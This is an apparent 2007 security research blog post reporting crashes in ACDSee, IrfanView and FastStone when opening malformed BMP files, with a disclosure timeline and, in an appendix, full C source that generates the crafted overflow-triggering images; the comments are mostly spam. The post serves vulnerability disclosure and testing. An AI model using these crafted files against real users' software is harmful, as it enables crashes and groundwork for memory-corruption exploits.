Wednesday, April 4, 2007

Several Windows image viewers vulnerabilities


Table of contents

1. Introduction
2. Description of experiments
3. Image viewers
4. Experimental results
5. Concluding remarks

Appendix I - Timeline
Appendix II - A possible Win XP SP1 vulnerability
Appendix III - Source code


1. Introduction

The purpose of this post is to present a small research covering security of several popular Windows image viewers. Although, when discussing security of image viewing software, web browsers are usually implied, since they will be on the 'front lines' in the unsafe environment such as the Internet, there are cases in which you may open potentially dangerous image file with your favorite image viewer. Some examples are:

- If you click on the attachment in your email application
- If you click on a file in an archive (such as zip or rar) you downloaded or got by email
- If you open a file on a network shared folder
- If you download the file using p2p programs such as BitTorrent and eMule


2. Description of experiments

The experiments were conducted as follows: Several errornous windows bitmap (.bmp) files were specially crafted to cause buffer overflows in certain cases, if such cases are not handled properly by the opening application. Each of these images was opend with all of the viewers included in this research and unexpected viewer behavior was noted. Here is the list of images used with their short descriptions.

paletteof1.bmp
This file defines a colormap larger than 256 entries (max allowed)

paletteof2.bmp
Similar to paletteof1.bmp, except the colormap is even larger

rle8of1.bmp
Uses run-length encoded blocks that extend beyond the image dimensions

rle8of2.bmp
Similar to rle8of1 except errornous RLE blocks start with a different offset

rle8of3.bmp
Uses xoffset and yoffset command in RLE encoded bmp in order to escape past image boundaries, then uses non-RLE encoded blocks to write data

rle8of4.bmp
similar to rle8of4.bmp except it doesn't use xoffset and yoffset, but still specififies enough non-RLE encoded blocks to escape image boundaries

wh3intof.bmp
Image dimensions are set so that width*height*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided

wh4intof.bmp
Image dimensions are set so that width*height*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of bitmap bits to be smaller than the actual data provided

w3intof.bmp
Image dimensions are set so that width*3 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided

w4intof.bmp
Image dimensions are set so that width*4 causes integer overflow in 32-bit processors thus causing the amount of memory allocated for the storage of a single bitmap row to be smaller than the actual data provided

The code used to generate all of the above images is provided in Appendix III, so you can use it to test your favorite image viewer if it was not included here.


3. Image viewers

Several popular image viewers were selected for this test. The most recent version of these viewers at the time of testing was used. The viewers are

ACDSee 9.0 Photo Manager
IrfranView 3.99
FastStone Image Viewer 2.9


4. Experimental results

Test system: Windows XP SP2 on Mobile AMD Sempron 3000+, 512MB RAM

ACDSee 9.0 Photo Manager

w4intof.bmp - Application closes

ACDSee 9.0 Quick View

w3intof.bmp - Microsoft Visual C++ Runtime Library: Runtime Error
w4intof.bmp - Application crashes, Exception code 0xc0000005 (access violation)

IrfranView 3.99

rle8of3.bmp - Application crashes, Exception code 0xc0000005 (access violation)
rle8of4.bmp - Application crashes, The memory could not be "written" Application error

FastStone Image Viewer 2.9

wh3intof.bmp - Application window closes, however application keeps running in the background consuming 100% of CPU resource
wh4intof.bmp - Application closes


5. Concluding remarks

All of the applications tested showed some sort of unpredicted behavior on some of the images, demonstrating the need to further enhance the security of products of this type. Accessing memory locations outside the allowed space, possible in some applications as demonstrated above, is especially dangerous since it has a potential for being exploited by a malicious hacker to execute arbitrary code on the unsuspecting user's computer. Other vulnerabilities should also not be disregarded since they could, in theory at least, be used in Dos attacks.
Since no actual code execution was analysed in detail, it is impossible to say from the above just what consequences could any of the above have. I leave this analysis to the vendors of applications tested.
Note that this small research only covers bmp images, so that the presence of various other vulnerabilities is also possible (if not probable) in the code used to handle decoding of images in other formats.
All in all, best be carefull next time you click on that image of Britney Spears' shaved ... head :-)


Appendix I - Timeline

Feb 15 2007 - Experiments made
Feb 18 2007 - 1st attempt to contact vendors
Feb 19 2007 - IrfranView programmer responded, said the code would be fixed in the upcoming version, due out soon
Feb 21 2007 - 2nd attempt to contact remaining vendors
Feb 23 2007 - Got response from ACD System support saying that they forwarded the information to the Quality Assurance and that they would contact me when they hear back from them. Never heard from them after that.
Apr 04 2007 - Release of this report

Note: It is possible that some of the bugs mentioned here were fixed quietly. I didn't check.


Appendix II - A possible Win XP SP1 vulnerability

On an old machine running Windows XP SP1 I encountered unusual behavior with one of my test images. When clicking on the w4intof.bmp in Windows Explorer (with the file details pane on the left of the window turned on) or viewing files as thumbnails in the containing folder, the Explorer crashes and Windows reports the exception code 0xc0000005, indicating a possible overflow. It is possible that Windows Explorer in SP1 too suffers from this kind of vulnerability. However I only had that one machine with SP1 installed and on the machines with other windows versions (such as XP SP2) I didn't encounter any unusual behavior. I wrote to Microsoft about this promply after discovery. They responded that they no longer support XP SP1 and this is not something they would investigate for for an out-of-support product.


Appendix III - Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


struct BITMAPFILEHEADER {
unsigned int bfSize;
unsigned int bfReserved;
unsigned int bfOffBits;
};

struct BITMAPINFOHEADER {
unsigned int biSize;
unsigned int biWidth;
unsigned int biHeight;
unsigned short biPlanes;
unsigned short biBitCount;
unsigned int biCompression;
unsigned int biSizeImage;
unsigned int biXPelsPerMeter;
unsigned int biYPelsPerMeter;
unsigned int biClrUsed;
unsigned int biClrImportant;
};

void writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {
BITMAPFILEHEADER fileheader;
BITMAPINFOHEADER infoheader;

memset(&fileheader,0,sizeof(BITMAPFILEHEADER));
memset(&infoheader,0,sizeof(BITMAPINFOHEADER));

unsigned char sig[2];
sig[0] = 'B';
sig[1] = 'M';

fileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;
fileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;

infoheader.biSize = 40;
infoheader.biWidth = width;
infoheader.biHeight = height;
infoheader.biPlanes = 1;
infoheader.biBitCount = bpp;
infoheader.biCompression = compression;
infoheader.biClrUsed = numpalettecolors;

FILE *fp = fopen(filename,"wb");
fwrite(&sig,sizeof(sig),1,fp);
fwrite(&fileheader,sizeof(BITMAPFILEHEADER),1,fp);
fwrite(&infoheader,sizeof(BITMAPINFOHEADER),1,fp);
if(palette) fwrite(palette,numpalettecolors*4,1,fp);
fwrite(data,numdatabytes,1,fp);
fclose(fp);
}

int main() {
unsigned char * buf;
buf = (unsigned char *)malloc(4000000);
memset(buf,0,4000000);
unsigned char * buf2;
buf2 = (unsigned char *)malloc(4000000);
memset(buf2,0,4000000);

//overflows specifying too large palette
writebmp("ok8bit.bmp",16,16,8,0,buf,256,buf,16*16);
writebmp("paletteof1.bmp",16,16,8,0,buf,65535,buf,16*16);
writebmp("paletteof2.bmp",16,16,8,0,buf,1000000,buf,16*16);

//integer overflows with image dimensions
writebmp("ok24bit.bmp",16,16,24,0,NULL,0,buf,16*16*4);
writebmp("wh4intof.bmp",32769,32768,24,0,NULL,0,buf,4000000);
writebmp("wh3intof.bmp",37838,37838,24,0,NULL,0,buf,4000000);
writebmp("w4intof.bmp",1073741825,1,24,0,NULL,0,buf,4000000);
writebmp("w3intof.bmp",1431655767,1,24,0,NULL,0,buf,4000000);

//overflows with RLE encoded BMPs
buf2[0]=16;
buf2[1]=0;
writebmp("okRLE.bmp",16,1,8,1,buf,256,buf2,2);
for(long i=0;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of1.bmp",16,1,8,1,buf,256,buf2,1000000);
buf2[0]=15;
buf2[1]=0;
for(long i=1;i<500000;i++) {
buf2[i*2]=255;
buf2[i*2+1]=0;
}
writebmp("rle8of2.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
buf2[0]=0;
buf2[1]=2;
buf2[2]=255;
buf2[3]=0;
for(long i=4;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of3.bmp",16,1,8,1,buf,256,buf2,1000000);
memset(buf2,0,4000000);
for(long i=0;i<100000-1;) {
buf2[i]=0;
buf2[i+1]=254;
i+=255;
}
writebmp("rle8of4.bmp",16,1,8,1,buf,256,buf2,1000000);
}

15 comments:

Fabrice Roux said...

Is your computer hardware DEP compatible? Is hardware DEP protecting your system?

That might explain the difference of behavior between SP1 and SP2. SP2 by default protects the explorer.exe from buffer overruns.

IrfanView (as Opera) can't be protected by DEP so whatever the DEP status you won't be able to protect these apps.

More information about the DEP issues:
http://blog.fabriceroux.com/index.php?blog=1&title=hardware_dep_has_a_backdoor

Ivan Fratric said...

Thanks for your suggestion Fabrice. However, I don't think this is the case. I tried to turn off DEP fo explorer.exe with the same outcome. Besides AFAIK even with DEP turned on, buffer overflow would still cause an access violation exception to occur. It would only make exploitation of such overflow difficult.

I would be very much interested if anyone managed to crash any other Windows component besides Explorer in XP SP1 using this. Or in fact, if anyone managed to crash Windows Explorer in XP SP1 to finally have independent confirmation of this issue.

Anonymous said...

Good work - I used your files to kill
my company email client - bad stuff-
I will work up a POC & turn this in
to the software vendor - will certainly credit your work

again

good work - well done

DEP does not matter for DOS - will see if I can exploit with DEP on or Off

Ivan Fratric said...

Glad this was helpful to you. I would appreciate it if you would post a link to your discovery here if you publish it.

Fabrice Roux said...

DEP can lead to very exotic results. The most obvious one is when you run some plugins in Paint Shop Pro. (I believe it would lead to the same results in Photoshop but can't confirm) With DEP these plugins just don't succeed to run but they never raise a DEP memory violation. (sometimes you get one modal memory warning from what I assume is the "plugin manager".)

aliya seen said...

I am looking for someone who can provide online programming help with excellent experience. I am introducing web page so plz help me.

Pooja Sharma said...

Great post. This article is really very interesting and enjoyable. I think its must be helpful and informative for us. Thanks for sharing your nice post. website designing in jalandhar

Unknown said...

SAS Training Institute in noida- Webtrackker is the only training organization that distinguishes itself from industrial guidance. The organization provides not only orientations, but also ensures that training is consistent. Webtrackker provides training on SAS in the most practical way.

Hadoop Training Institute in Noida
Oracle Training Institute in Noida
Linux Training Institute in Noida
Dot net Training Institute in Noida

CIIT Noida said...

Thanks for sharing this amazing post with us.

Hadoop Training Institute in Noida

Best Hadoop Training in Noida

CIIT Noida said...

Nice looking sites and great work. Pretty nice information. it has a better understanding. thanks for spending time on it.

Hadoop Training Institute in Noida

Best Hadoop Training in Noida

CIIT Noida said...

CIITN is the Best Php training institute in Noida and delhi Ncr. You will get Live Project Training on PHP by our PHP expert who have 5+ year industrial experience.Focus on practical and live project training. In our PHP training, we you will learn core PHP, advance PHP, HTML, CSS, JavaScript, jQuery, Bootstrap, Cake PHP and Wordpress.CIITN provides 100% job assistance in PHP training. CIITN is well known PHP coaching center because our 100% PHP students are placed now.


Ciitnoida provides Core and java training institute in noida. We have a team of experienced Java professionals who help our students learn Java with the help of Live Base Projects. The object-oriented, class-based build of Java has made it one of most popular programming languages and the demand of professionals with certification in Advance Java training is at an all-time high not just in India but foreign countries too.

By helping our students understand the fundamentals and Advance concepts of Java, we prepare them for a successful programming career. With over 13 years of sound experience, we have successfully trained hundreds of students in Noida and have been able to turn ourselves into an institute for best Java training in Noida.


java training institute in noida
php training in noida
linux training in noida
linux institute in noida
java course in noida

Dida ELhaik said...

خدمات نقل وتخزين الاثاث
تعرف شركة شراء اثاث مستعمل جدة
ان الاثاث من اكثر الاشياء التي لها ثمن غالي ومكلف للغايةويحتاج الي عناية جيدة وشديدة لقيام بنقلة بطريقة غير مثالية وتعرضة للخدش او الكسر نحن في غني عنه فأن تلفيات الاثاث تؤدي الي التكاليف الباهظة نظرا لتكلفة الاثاث العالية كما انه يؤدي الي الحاجه الي تكلفة اضافية لشراء اثاث من جديد ،
شركة شراء اثاث مستعمل بجدة
، ونظرا لان شركة نقل اثاث بجدة من الشركات التى تعلم جيدا حجم المشكلات والاضرار التى تحدث وهي ايضا من الشركات التى على دراية كاملة بكيفية الوصول الى افضل واحسن النتائج فى عملية النقل ،كل ماعليك ان تتعاون مع شركة شراء الاثاث المستعمل بجدة والاعتماد عليها بشكل كلي في عملية نقل الاثاث من اجل الحصول علي افضل النتائج المثالية في عمليات النقل
من اهم الخدمات التي تقدمها شركة المستقبل في عملية النقل وتجعلك تضعها من
ضمن اوائل الشركات هي :
اعتماد شراء الاثاث المستعمل بجدة علي القيام بأعمال النقل علي عدة مراحل متميزة من اهما اثناء القيام بالنقل داخل المملكة او خارجها وهي مرحلة تصنيف الاثاث عن طريق المعاينة التي تتم من قبل الخبراء والفنين المتخصصين والتعرف علي اعداد القطع الموجودة من قطع خشبية او اجهزة كهربائية ا تحف او اثاث غرف وغيرهم.
كما اننا نقوم بمرحلة فك الاثاث بعد ذلك وتعتمد شركتنا في هذة المرحلة علي اقوي الاساليب والطرق المستخدمة ويقوم بذلك العملية طاقم كبير من العمالة المتربة للقيام بأعمال الفك والتركيب.
ارقام شراء الاثاث المستعمل بالرياضثم تأتي بعد ذلك مرحلة التغليف وهي من اهم المراحل التي تعمل علي الحفاظ علي اثاث منزلك وعلي كل قطعة به وتتم عملية التغليف بطريقة مميزة عن باقي الشركات.
محلات شراء الاثاث المستعمل بالرياضويأتي بعد ذلك للمرحلة الاخيرة وهي نقل الاثاث وتركيبة ويتم اعتمادنا في عملية النقل علي اكبر الشاحنات المميزة التي تساعد علي الحفاظ علي كل قطع اثاثك اثناء عملية السير والنقل كما اننا لا نتطرق الي عمليات النقل التقليدية لخطورتها علي الاثاث وتعرضة للخدش والكسر .
تخزين الاثاث بالرياض
ارقام شراء الاثاث المستعمل بجدة
تمتلك شركة المستقبل افضل واكبر المستودعات المميزة بجدة والتي تساعد علي تحقيق اعلي مستوي من الدقة والتميز فأذا كنت في حيرة من اتمام عملية النقل والتخزين فعليك الاستعانة بشركة نقل اثاث بجدة والاتصال بنا ارقام محلات شراء الاثاث المستعمل بجدة
والتعاقد معنا للحصول علي كافة خدماتنا وعروضنا المقدمة بأفضل الاسعار المقدمة لعملائنا الكرام .

preeti verma said...

short term job oriented courses after graduation
100% job guarantee course
job oriented courses after graduation
courses with guaranteed jobs
professional courses with job placement

Unknown said...

I have read your blog its very attractive and impressive. I like it on your blog.
dual sim smartphone
keypad mobiles with wifi and whatsapp

Naveen k said...

Needed to compose you a very little word to thank you yet again regarding the nice suggestions you’ve contributed here.
bosch simultaneous interpretation system